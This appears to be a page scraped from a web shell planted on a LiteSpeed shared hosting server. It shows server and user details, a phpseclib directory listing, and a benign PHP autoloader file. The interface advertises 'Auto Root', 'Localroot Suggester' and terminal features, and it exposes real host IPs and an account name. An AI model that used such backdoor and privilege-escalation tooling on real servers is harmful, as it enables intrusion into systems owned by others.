Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
softaculous /
lib /
classes /
phpseclib /
Delete
Unzip
Name
Size
Permission
Date
Action
Crypt
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
File
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
Math
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
Net
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
System
[ DIR ]
drwxr-xr-x
2025-02-25 07:30
paragonie
[ DIR ]
drwxr-xr-x
2026-04-24 05:43
phpseclib
[ DIR ]
drwxr-xr-x
2026-04-24 05:43
autoloader.php
1.55
KB
-rw-r--r--
2026-04-22 09:09
bootstrap.php
448
B
-rwxr-xr-x
2026-04-22 09:09
openssl.cnf
104
B
-rwxr-xr-x
2026-04-22 09:09
phpseclibmaker.php
673
B
-rwxr-xr-x
2026-04-22 09:09
psl.class
222.11
KB
-rwxr-xr-x
2026-04-22 09:09
Save
Rename
<?php /** * Custom Autoloader for phpseclib3 and its dependencies. * * This script registers a function that automatically loads class files * when they are first used. It is configured for the specific directory * structure provided. */ spl_autoload_register(function ($class) { // The base directory for this autoloader file is .../backuply/lib/classes/ // We use __DIR__ to build the correct path from this location. $prefixes = [ // Namespace for phpseclib and its path relative to this file 'phpseclib3\\' => __DIR__ . '/phpseclib/', // Namespace for the 'paragonie' dependency and its path // IMPORTANT: This is required for phpseclib3 to work. 'ParagonIE\\ConstantTime\\' => __DIR__ . '/paragonie/constant_time_encoding/src/', ]; // Loop through the namespace prefixes foreach ($prefixes as $prefix => $base_dir) { // Does the class use the namespace prefix? $len = strlen($prefix); if (strncmp($prefix, $class, $len) !== 0) { // No, move to the next registered autoloader continue; } // Get the relative class name (e.g., Net\SFTP) $relative_class = substr($class, $len); // Replace the namespace separator with a directory separator and add .php $file = $base_dir . str_replace('\\', '/', $relative_class) . '.php'; // If the file exists, require it and we're done if (file_exists($file)) { include($file); return; } } });